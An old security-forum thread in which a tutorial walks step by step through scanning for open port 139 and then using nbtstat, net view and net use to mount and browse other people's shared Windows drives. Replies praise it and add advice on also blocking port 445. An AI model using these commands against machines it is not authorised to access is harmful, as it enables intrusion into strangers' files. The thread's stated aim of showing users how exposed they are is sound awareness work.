-
May 25th, 2002, 04:16 PM
#1
net bios hacking
NetBIOS Tutorial by RiOtEr
NetBIOS stands for Network basic input output system and is used in Windows for its file and printer sharing.
1. NetBIOS
To use NetBIOS remotely the computer has to have it running and unprotected first. To find if a computer has netBIOS boost up your favourite portscanner and look for netBIOS:
25/tcp open smtp
110/tcp open pop-3
135/tcp open loc-srv
139/tcp open netBIOS-ssn
If your results look like that then you're set...
2. nbtstat
To get the info you need for the attack we use a program called nbtstat:
Open up your console in WinXP, or a DOS-prompt in earlier windows-versions.
Code:
c:\>nbtstat -A 127.0.0.1
Use -A if you're using IP addresses. If you're going to use hostnames use -a.
This will give you what is called a nametable:
Code:
Local Area Connection 3:
Node IpAddress: [xxx.xxx.xxx.xxx] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
computername <00> UNIQUE Registered
workgroupname <00> GROUP Registered
computername <20> UNIQUE Registered
workgroupname <1E> GROUP Registered
workgroupname <1D> UNIQUE Registered
..__MSBROWSE__. <01> GROUP Registered
MAC Address = xx-xx-xx-xx-xx-xx
This is a friend's nametable (names and workgroups have been edited to save him from elite_hax0rs)
Now, the line
Code:
computername <20> UNIQUE Registered
is the interesting one as <20> means that filesharing is enabled: that means we can try to connect to that computer.
First, we need to know their harddrive names etc, and we need to see if it's xp and if they have SharedDocs. To do this we use net view \\ipaddress
Code:
C:\>net view \\127.0.0.1
Shared resources at \\xxx.xxx.xxx.xxx
Share name Type Used as Comment
-----------------------------------
SharedDocs Disk
The command completed successfully.
That's the result you should get (it wil be different on a non-WinXP box ).
Now comes the interesting part: we want to use and browse the person's harddrive just like it was locally. For doing that, we use a program called net use
net use letter: \\ipaddress\name
Code:
c:\>net use g: \\127.0.0.1\SharedDocs
The command completed successfully.
c:\>net use h: \\127.0.0.1\C
The command completed successfully.
Now their harddrive is "mirrored" to the drive letter we specifided (so make sure its not a drive that exists on your computer). Now just browse it as you would a local drive:
In windows XP (not sure about other windows) you can open up "my computer": the drive you just added will be there for you to browse in all the GUI goodness.
When you're done, make sure you remove the shared drive from your machine:
Code:
c:\>net use /delete g:
g: was deleted successfully.
Some systems may be locked with passwords (win2k, WinNT):
If you know the password, you would use this command:
Code:
net use password \\ip\sharename
(not sure about that one...)
Now, many people will be saying "this is a security site, why are you telling us this?". The reason is simple: I'm showing you how easy it is for your windows machine to be hacked withough proper protection... Moral of this story: always cover port 139.
RiOtEr
-
May 25th, 2002, 04:31 PM
#2
-
May 25th, 2002, 06:34 PM
#3
-
May 25th, 2002, 07:53 PM
#4
-
May 25th, 2002, 10:00 PM
#5
Good post, I learned something!
-
May 25th, 2002, 11:12 PM
#6
<quote>Moral of this story: always cover port 139.</quote>
True, but Win2000 and WinXP also listen on port 445 for SMB service directly over TCP. port 139 is like "smb over netbios over tcp" (sortof)...
Moral of this follow up: if you run w2k or wXP, always cover port 139 AND 445
Ammo
Credit travels up, blame travels down -- The Boss
-
May 25th, 2002, 11:19 PM
#7
So when you port scan a system and netbios services are open you can just use net to connect and rummange through their directories?
-
May 25th, 2002, 11:23 PM
#8
Sometimes...
Depends if there are actually drives shared, and depends on if passwords are set.
Ammo
Credit travels up, blame travels down -- The Boss
-
May 26th, 2002, 12:59 AM
#9
very good, expect some green, amn best tut ive ever read.
preep
http://www.attrition.org/gallery/computing/forum/tn/youarenot.gif.html
-
May 26th, 2002, 01:23 AM
#10
um... ur all probably gunna tell me i have stupid questions but at least i might be safe if its answered, if u have a firewall doesnt it protect all ports?
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|